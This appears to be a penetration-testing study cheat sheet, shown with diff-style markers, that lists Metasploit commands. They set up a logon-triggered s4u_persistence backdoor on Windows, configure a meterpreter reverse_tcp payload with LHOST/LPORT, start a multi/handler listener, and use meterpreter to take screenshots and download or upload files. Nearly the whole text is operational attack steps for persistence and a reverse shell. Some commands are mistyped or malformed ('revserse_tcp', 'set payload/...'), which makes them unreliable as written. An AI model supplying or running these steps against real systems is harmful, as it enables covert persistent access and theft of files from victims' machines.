nairuzabulhul/R3d-Buck3T/PTS/XL_CheatSheet.md

 __[s4u_persistence]                             |  install backdoor on meterpreter session using__

-- use exploit/windows/local/s4u_persistence     |  module
+> - use exploit/windows/local/s4u_persistence     |  module

-- show options                                  |  show options that come with the module
+> - show options                                  |  show options that come with the module

-- set trigger logon                             |  sets up the module to start when the usre logson
+> - set trigger logon                             |  sets up the module to start when the usre logson

+>  - set payload/windows/meterpreter/reverse_tcp  | generated the payload type reverse shell

+> - set LHOST hostIP			          | add host IP

+> - set LPORT hostPORT 				  | add host port

+> - exploit

+__Set up a listener handler__

+> - use exploit/multi/handler    		 | setting up listener handler

+> - set payload/meterpreter/revserse_tcp   | setting up meterpreter

+> - set LHOST				 | host IP

+> - set LPORT 				 | host Port

+> - show options 				 | show the options that comes with a module

--
+> - exploit

+__Meterpreter Commands:___

+> - screenshot                           | for desktop screenshot

+> - download filePath 			 | download files from the other machine

+>- upload filePath 			 | upload files to the other machine

+> - help 				 | to show all the meterpreter commands